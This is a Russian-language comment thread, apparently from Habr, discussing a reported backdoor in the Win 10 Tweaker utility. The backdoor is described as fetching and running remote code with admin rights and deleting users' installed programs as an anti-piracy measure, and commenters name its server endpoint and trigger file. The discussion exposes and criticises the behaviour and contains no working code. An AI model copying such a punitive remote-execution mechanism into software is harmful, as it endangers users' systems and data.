  Среди модераторов на том ресурсе присутствует крайний неадекват. Не брезгуют угрозами в личных сообщениях «Успокойтесь уже или я вас успокою», хотя я всего-то пожаловался на то, что одна из раздач вводит пользователей в заблуждение (это была сборка Windows 7 с заявленной поддержкой UEFI, но никаким UEFI там и не пахло, стандартный установщик через CSM, я им подробно расписал что такое UEFI Class 3, но до этих дуболомов не дошло или они некомпетентны в категориях, которые модерируют). После этого желание посещать тот ресурс пропало совсем, я в 90-е оказался сыт по горло этой гопотой, спасибо, больше не надо.

GriegMount
14.05.2021 17:05
#23034780
+2
В этой программе реализован бан по железу, причём не важно нарушили вы пользовательское соглашение или нет. Мой случай был таков, что я купил PRO версию Win10Tweaker и захотел использовать её на 2-ух устройствах. На одном из стримов или видео автора я услышал что это абсолютно нормально и можно попросить лицензию для второго ПК. В итоге он это отрицал, а потом начал вымогать деньги с условием приобрести ещё одну лицензию в течении часа или я получу бан по железу на 2-ух стройствах. В итоге денег я ему не скинул, потерял PRO версию и получил бан по железу. Делайте вывод сами о натуре данного homo.
1. JerleShannara
  14.05.2021 17:58
  #23034976
  +2
  Ммм, прямо аж желание расчехлить старушку Иду Хексрееву появилось.
  1. vladkorotnev
    14.05.2021 18:13
    #23035048
    Думается, для такого, пардон, высера, проще для Софии гуи написать, чем тянуться до ярлыка иды
    
    Sanctuary_s Автор
    14.05.2021 18:17
    #23035072
    Пишется нами. :) И оболочка (wrapper) от Дэвида была переписана полностью. Скоро он 2.0 релизнет.

UnoLagrima
14.05.2021 17:59
#23034992
Что думаешь по поводу O&O ShutUp10 -Free antispy tool for Windows 10?
1. qw1
  14.05.2021 20:13
  #23035398
  здесь

avhelp
14.05.2021 20:17
#23035410
+1
Один раз (недавно) решил протвикать этой штуковиной только установленную Win10. По началу вроде все нормально работало, поэтому наустанавливал нужных программ и забыл. А потом, в самый неподходящий момент, стали вылезать проблемы. Не надо пользоваться этой софтиной, даже без учета черных дыр в ней.
Еще интересно, что на nnm местные админы усердно защищают сие творение, банят, затирают критику.

Pasha13666
14.05.2021 20:17
#23035412
-1
Я твикер обсуждал, но использовал. Больше не буду. Просто я всегда читаю описания твиков и именно в win10tweaker они какие-то агрессивные, что ли. Как будто автор лучше знает, что тебе нужно. Особенно понравилось описание отключения сглаживания шрифтов. Недавно перешёл на китайский твикер в DISM++. Что-то китайской слежки я боюсь меньше, чем выкрутасов от своих.

TigerClaw
14.05.2021 20:50
#23035498
Еще во времена XP юзал известный в то время твикер. Сейчас я их не использую. Windows стала слишком сложна и отключение многих вещей не однозначно или влияет не предсказуемо на систему. Да и ресурсы железа достаточны.

Sergey-S-Kovalev
14.05.2021 21:03
#23035540
+1
20 лет назад я раз в два месяц переустанавливал винду на компе и тратил два дня на полную переустановку софта по списку, покупал диски с свежими подборками. потом я понял что до следующей переустановки винды 70 процентов софта в виде фотошопов и партишн мейджиков не использовалось ни разу и ставил софт только когда он реально был нужен.

15 лет назад я держал на флешке архив с кучей reg файлов собственноручно собранных и подобранных под свое понимание правильности. И была папка с собранными самолично автоинсталяторами программ и обновлений на нужные ОС бережно поддерживаемая в актуальном виде. потом я понял что софта то нужно 10ток наименований, а появившийся в то время легкодоступный инет позволят сам софт обновлять без проблем.

10 лет назад я ставил винду исключительно с своих автоинсталл сборок или с домашнего WDS сервера переподготовленный образ, но обновлял все руками.

5 лет назад я просто ставил винду с флешки созданной MCT и свободный софт через ninite.com, плюс всякие антивирусы и дрова.

Сейчас у меня домашний сервер сам собирает, обновляет, преднастраивает и льет свежий билд винды на предназначенную для этих дел флешку и образ для WDS в середине каждого месяца. И даже не обидно что за месяц может не возникнуть потребности кому нить помочь с ноутом с перезаливом винды. Оно как то само там живет, внимания не требует. Кто захочет себе другой браузер или привык к винрару — сами себе поставят.

И да. уже почти никаких твиков. Все обычное и дефолтное. Вокруг ссд и куча памяти, смысла уже нет. А время лучше на что то другое более полезное потратить.

RigidStyle
14.05.2021 21:32
#23035610
Не совсем понял, что все таки происходит.
Твикер при попытке его хакнуть, а не купить, удаляет последние 50 установленных программ? Типо «ты решил меня кинуть? тогда я тебя накажу», так?
Этот самый бекдор, это конечно, плохо, но что он делает еще, кроме удаления программ? Ну, условно, можно ли через него подгрузить троянов и т.д.? Не, ну понятно, что можно, на то он и бекдор, я имею в виду, может ли это сделать кто угодно, или только автор твикера?
1. Sanctuary_s Автор
  14.05.2021 21:32
  #23035612
  +1
  Нет, при условиях особых триггерится бэкдор, и автоматом качается код и выполняется. А так он в спячке. Ссылка на зловредный код одна, но код раньше менялся. Ресурс подчинялся лишь ему и только при запущенной проге. Читаем внимательно разбор!
  1. RigidStyle
    14.05.2021 21:44
    #23035648
    А какие это «определенные условия»? Я понял, что удаление запускается при наличии фала по пути, но это для скрипта, а для пользователя когда это «выстрелит»?
    
    Sanctuary_s Автор
    14.05.2021 21:48
    #23035670
    Как только сработает автозагрузка: логин ли ребут.
    
    SergeyMax
    15.05.2021 09:37
    #23036560
    а для пользователя когда это «выстрелит»?
    Файл System.deps.dll в каталоге с программой похоже создаёт какой-то кряк.

glowingsword
14.05.2021 22:03
#23035702
+2
Эх, ещё бы кто-то про Thaiphoon Burner такую статью написал. Я не сторонник винды, не сторонник и шароварного ПО под неё, но такие вот "приёмчики" борьбы с пиратами — хуже самого пиратства.

bootracer
14.05.2021 22:26
#23035760
+1
Вопрос к автору статьи. Программа Windows 10 Sophia Script — ваша?
1. Sanctuary_s Автор
  14.05.2021 22:28
  #23035768
  Да. Но я не стал специально упомянать как наши текущий продукт, так и будущий — прямо конкурента Win 10 Tweaker, чтобы не обвинили в рекламе.
  1. avhelp
    14.05.2021 22:30
    #23035778
    Уважаемая редакция, разрешите глупый вопрос.
    Можно ли ожидать от вас твикера в привычной галочной форме с окошками?
    
    Sanctuary_s Автор
    14.05.2021 22:34
    #23035788
    Именно это мы и делаем: опенсорс (но в далёком будущем будет платная версия), хардкор, грабли и потраченная тонна денег на дизайн.
    https://github.com/Sophia-Community/SophiApp
    Эту версию даже я не компилировал. Я позже триггерну облако, и оно скомпилит. Пока трудности с дизайном, ибо дно делать не хотели изначально. Пока об этом рано говорить. Как будет что-то, что будет требовать теста народа, я создам статью.
  1. bootracer
    14.05.2021 22:36
    #23035794
    Просто внести ясность, это конкурентная борьба или за чистоту рядов?
    Хочется верить в хорошие намерения.
    А как Вы боретесь с пиратством?
    
    Sanctuary_s Автор
    14.05.2021 22:46
    #23035816
    +1
    Хотел ещё очень написать, но был такой ад на работе, что не до такого. Вот место работы сменил и оформил, наконец.
    Мы прекрасно между собой понимаем, что никак этого не избежать. Это часть нашего мира. Кто хочет, тот купит. Кто захочет скачать из соседней темы, того не остановить. Делай так, чтобы возникло желание купить твой продукция, и люди потянутся. Надо было Хачатуру учить маркетинг в вузе. :D

vilgeforce
14.05.2021 22:56
#23035834
Если авторы «твикеров» такие умные — почему еще не работают в Microsoft? Винда последние лет 10, наверное, не то чтобы очень уже требует допиливания — работает из коробки и есть особо не просит.
1. avhelp
  15.05.2021 00:37
  #23036050
  +1
  Если бы винда давала галочную форму отключения ненужных пользователю услуг, то никаких твикеров бы не нужно было. Но про основное назначения системы — дать возможность запустить нужные мне программы — давно уже забыто и идет впаривания всего ненужного, чтобы максимум загрузить память и накопитель информации.
  1. vilgeforce
    15.05.2021 00:42
    #23036070
    +1
    Расскажете как загружает память система и как — современный браузер из которого вы это пишете?

masv
14.05.2021 23:06
#23035858
Пользуюсь вин 10 твикером давно, и даже купил про версию, никогда проблем не было с ней. Правда я давно её не обновлял, поставил винду, протвикал и больше, как правило, не запускаю. Очень печально что Хачатур так «мстит» кому попало.

Sanctuary_s Автор
15.05.2021 00:56
#23036106
+1
Плюй в глаза — божья роса: t.me/win10tweaker/46

Сайт Win 10 Tweaker Pro временно заблокирован в связи с жалобой на вирусы. На самом деле, это делается очень просто, любой человек может подать жалобу, соответственно, хостинг должен как-то реагировать, поэтому это является стандартной практикой. Скоро сайт и форум снова заведутся, а хостинг добавит себе исключение
1. ProRunner
  15.05.2021 10:04
  #23036606
  Зашёл на канал, там автор аудио-сообщением прямо подтверждает поведение, только говорит, что это «не малварь, а жирный намёк»
  1. unsignedchar
    15.05.2021 10:13
    #23036618
    +1
    жирный намёк
    
    КМК, это очень жирный намёк бежать подальше от аффтара вместе с его поделиями. Сегодня у него в планах жирный намёк, затра он решит, что неплохо бы ботнет организовать, или денег себе намайнить.
  1. Gengenid
    15.05.2021 10:22
    #23036630
    Нифига у него подгорело. Четверть часа распинался, как ему все равно кто что там пишет
    
    unsignedchar
    15.05.2021 10:49
    #23036684
    Репутация создаётся годами, а уничтожается в один момент. Но кое-кто этого ещё не понял.
  1. jryj
    15.05.2021 11:21
    #23036786
    автор аудио-сообщением прямо подтверждает поведение
    
    Вот это основное.
    
    ВО-первых, это его намеренное действие. Не случайность, ошибка или там взломали. Нет, он сам осознанно добавил в свою программу этот бэкдор. Что он там скачивает с сайта, на сколько оно безобидно и т.п. — значение уже не имеет. Сегодня это безобидная штука, а завтра будет пароли из браузера тырить. Тем более программа запускается с админскими правами.
    
    И второе, что важно, он ни сколько не раскаивается. Своё поведение считает правильным.
1. Sanctuary_s Автор
  15.05.2021 11:17
  #23036774
  Я только сейчас начал слушать его послание. Он думает, что это я все изыскания сделал. Нет, я лишь статью написал. За всем этим стоят совсем другие люди. Я лишь оформил красиво. :D

Vlad622
15.05.2021 01:09
#23036134
-3
То есть когда ваш любимый Microsoft занимается добавлением службы которая предназаначена для того чтобы включить другую службу если юзер не дай бог посмел ее выключить, лишь бы ни в коем случае нельзя было полностью отрубить слежку и/или обновления, всех это устраивает. Также как всех устраивает что при покупке современной игры, процент от ее стоимости уходит на то чтобы издатель оплатил защиту, которая в свою очередь отъедает производительность и ведет «общение» со всякими левыми серверами.
А когда автор бесплатной в первую очередь программы, прикалывается над теми кто жмотит $5 за доп. функционал который мало кто использует, это знаете ли трагедия мирового масштаба, нужно немедленно все заблокировать, ввести военное положение и немедленно найти этого гада.

P.S. Если бы «пострадавшие» кроме скачивания взломанного твикера, еще и посмотрели бы видео о резервном копировании, то проблем бы восстановить те 50 удаленных программ не составило бы труда.
1. daniillnull
  15.05.2021 01:36
  #23036176
  +2
  Проблема не столько в том, что автор решил защитить свою программу, сколько в том, как он это делает. Встраивание малвари - явный перебор. Аврот в любой момент может добавить что-то более вредоносное в скачиваемую нагрузку.
1. SagePtr
  15.05.2021 01:44
  #23036188
  +3
  Так уж сложилось, что в цивилизованном мире подобные «приколы» не поощряются, да и законодательство РФ нарушают. Столь же низкий поступок, как облить зимой ступеньки бесплатной поликлиники и смеяться над поскользнувшимися «неудачниками», которые решили этой поликлиникой нахаляву воспользоваться, «зажмотив» на вашу супер-мега-крутую платную.
  Какому-нибудь отбитому гопнику это может быть и покажется весёлым и смешным, но никак не цивилизованному человеку. Прикол, или, как нынче модно называть, пранк — должен быть в первую очередь безопасен и безвреден для окружающих, иначе это в лучшем случае — мелкое хулиганство, а в худшем — что-то намного серьёзнее, за последствия которого может наступить уголовная ответственность.
1. SerjV
  15.05.2021 11:42
  #23036874
  Если бы «пострадавшие»
  
  А наличие пострадавших и не требуется, у ст.273 УК РФ состав преступления формальный.
  
  Про то, что сформулирована она так, что «полстраны посадить можно» — отдельный разговор, но данный пример как раз не про «обратную сторону» этой статьи.

OnvogSGN
15.05.2021 01:11
#23036140
Для неподготовленных юзеров, которые сталкиваются с Windows, настройки ОС иногда становятся настоящим темным лесом
И вот эти гипотетические «неподготовленные юзеры» первым делом непременно хотят отключить телеметрию nvidia, фоновое обновление синтеза речи, домены сборы данных (что бы это не значило) и т.д.? Серьёзно?

Не будем обсуждать личность автора и его отношение к пользователям, а также то, что он творит на своем форуме
А что он там творит?

И да, при чём здесь backdoor? Вы смысл этого слова понимаете? Никакого удалённого доступа он не получает
1. vladkorotnev
  15.05.2021 08:45
  #23036488
  +1
  И вот эти гипотетические «неподготовленные юзеры» первым делом непременно хотят отключить телеметрию nvidia, фоновое обновление синтеза речи, домены сборы данных (что бы это не значило) и т.д.? Серьёзно?
  Да, спасибо журналистам, которые с самого выхода винды 10 педалят тему страшной и ужасной телеметрии, которая делает резервную копию вашего диска с ~~порн~~котятами в майкрософт. Поэтому даже последний ламер, установив винду 10, знает — есть какая-то телеметрия, не знаю зачем, сказали что все данные ворует, надо выключить!
  
  Ну а т.к. те, кто понимают что это и зачем, могут всё отключить через ту же софию или ручками в реестре, то ЦА таких галочек от васяна остаётся именно лишь в лице вышеописанных кадров.
  
  Никакого удалённого доступа он не получает
  То есть по определённому триггеру скачать код на сишарпе со своего сайта, который уже менялся не раз, и загнать его на исполнение в программе, заведомо исполняемой от имени админа — это не бэкдор?

kkvark
15.05.2021 11:40
#23036860
Запрос идет не только на PrivilegeUser.php?key=Universal, но также и на PrivilegeUser.php?key=IDпользователя. И по второй ссылке также: если есть код то он выполнится.
Тоесть потенциально автор может выполнить произвольный код только у определенного пользователя…
1. Sanctuary_s Автор
  15.05.2021 11:41
  #23036862
  По ID идет отправка данных для оплаты. Там так устроено.

Sanctuary_s Автор
15.05.2021 11:42
#23036872
Добавил в шапку обновления. ЧТД, у автора шиза, конечно. Везде враги, подслушивают стены, он лучший программист, хакер, а вы все… Ну, понятно.

Бэкдор в Win 10 Tweaker, или современные методы борьбы с пиратством +84

Комментарии (212)

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор

Sanctuary_s Автор